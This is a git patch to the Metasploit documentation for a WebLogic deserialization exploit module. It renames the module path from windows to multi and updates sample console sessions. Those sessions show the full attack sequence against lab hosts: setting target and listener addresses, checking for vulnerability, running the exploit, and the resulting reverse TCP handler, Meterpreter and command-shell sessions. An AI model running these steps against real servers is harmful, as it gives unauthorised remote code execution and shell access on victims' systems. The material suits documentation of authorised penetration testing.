From e49435a7667792b9dad7283a94f73be5ee7d1e7b Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Fri, 31 Aug 2018 06:00:41 -0500 Subject: [PATCH] Update weblogic module docs Update the module docs to match the new name of the module. --- .../multi/misc/weblogic_deserialize.md | 40 +++++++++---------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/documentation/modules/exploit/multi/misc/weblogic_deserialize.md b/documentation/modules/exploit/multi/misc/weblogic_deserialize.md index 59a1ec2406..d1bfaef5d0 100644 --- a/documentation/modules/exploit/multi/misc/weblogic_deserialize.md +++ b/documentation/modules/exploit/multi/misc/weblogic_deserialize.md @@ -26,10 +26,12 @@ msf5 exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.121 srvhost => 172.22.222.121 msf5 exploit(multi/misc/weblogic_deserialize) > set srvport 8888 srvport => 8888 +msf5 exploit(multi/misc/weblogic_deserialize) > set target 1 +target => 1 msf5 exploit(multi/misc/weblogic_deserialize) > run [*] Exploit running as background job 0. -msf5 exploit(multi/misc/weblogic_deserialize) > -[*] Started reverse TCP handler on 172.22.222.121:4444 +msf5 exploit(multi/misc/weblogic_deserialize) > +[*] Started reverse TCP handler on 172.22.222.121:4444 [*] Sending stage (179779 bytes) to 172.22.222.175 [*] Meterpreter session 1 opened (172.22.222.121:4444 -> 172.22.222.175:49908) at 2018-08-08 17:53:07 -0500 sessions -i 1 @@ -43,41 +45,39 @@ System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows -meterpreter > +meterpreter > ``` ### Tested on Ubuntu 14.04 LTS x64 running Oracle Weblogic Server 10.3.6.0 on Sun SDK 1.6.0_29 ``` -msf5 > use exploit/windows/misc/weblogic_deserialize -msf5 exploit(windows/misc/weblogic_deserialize) > set rhosts 172.22.222.205 +msf5 > use exploit/multi/misc/weblogic_deserialize +msf5 exploit(multi/misc/weblogic_deserialize) > set rhosts 172.22.222.205 rhosts => 172.22.222.205 -msf5 exploit(windows/misc/weblogic_deserialize) > set lhost 172.22.222.197 -lhost => 172.22.222.197 -msf5 exploit(windows/misc/weblogic_deserialize) > set srvhost 172.22.222.197 -srvhost => 172.22.222.197 -msf5 exploit(windows/misc/weblogic_deserialize) > set verbose true +msf5 exploit(multi/misc/weblogic_deserialize) > set srvhost 172.22.222.207 +srvhost => 172.22.222.207 +msf5 exploit(multi/misc/weblogic_deserialize) > set lhost 172.22.222.207 +lhost => 172.22.222.207 +msf5 exploit(multi/misc/weblogic_deserialize) > set verbose true verbose => true -msf5 exploit(windows/misc/weblogic_deserialize) > check +msf5 exploit(multi/misc/weblogic_deserialize) > check [+] 172.22.222.205:7001 - Detected Oracle WebLogic Server Version: 10.3.6.0 [*] 172.22.222.205:7001 The target appears to be vulnerable. -msf5 exploit(windows/misc/weblogic_deserialize) > run -[*] Exploit running as background job 2. -msf5 exploit(windows/misc/weblogic_deserialize) > -[*] Started reverse TCP handler on 172.22.222.197:4444 +msf5 exploit(multi/misc/weblogic_deserialize) > run +[*] Exploit running as background job 0. +msf5 exploit(multi/misc/weblogic_deserialize) > +[*] Started reverse TCP handler on 172.22.222.207:4444 [*] 172.22.222.205:7001 - Sending handshake... [*] 172.22.222.205:7001 - Sending client object payload... [*] 172.22.222.205:7001 - Comparing host: 172.22.222.205 [*] 172.22.222.205:7001 - Sending payload to client: 172.22.222.205 [*] 172.22.222.205:7001 - Comparing host: 172.22.222.205 -[*] Command shell session 1 opened (172.22.222.197:4444 -> 172.22.222.205:35904) at 2018-08-28 10:59:20 -0500 +[*] Command shell session 1 opened (172.22.222.207:4444 -> 172.22.222.205:37168) at 2018-08-30 06:10:31 -0500 [*] 172.22.222.205:7001 - Server stopped. -msf5 exploit(windows/misc/weblogic_deserialize) > -sessions -i 1 + +msf5 exploit(multi/misc/weblogic_deserialize) > sessions -i 1 [*] Starting interaction with 1... -whoami -msfdev uname -a Linux ubuntu 4.4.0-134-generic #160~14.04.1-Ubuntu SMP Fri Aug 17 11:07:07 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux ```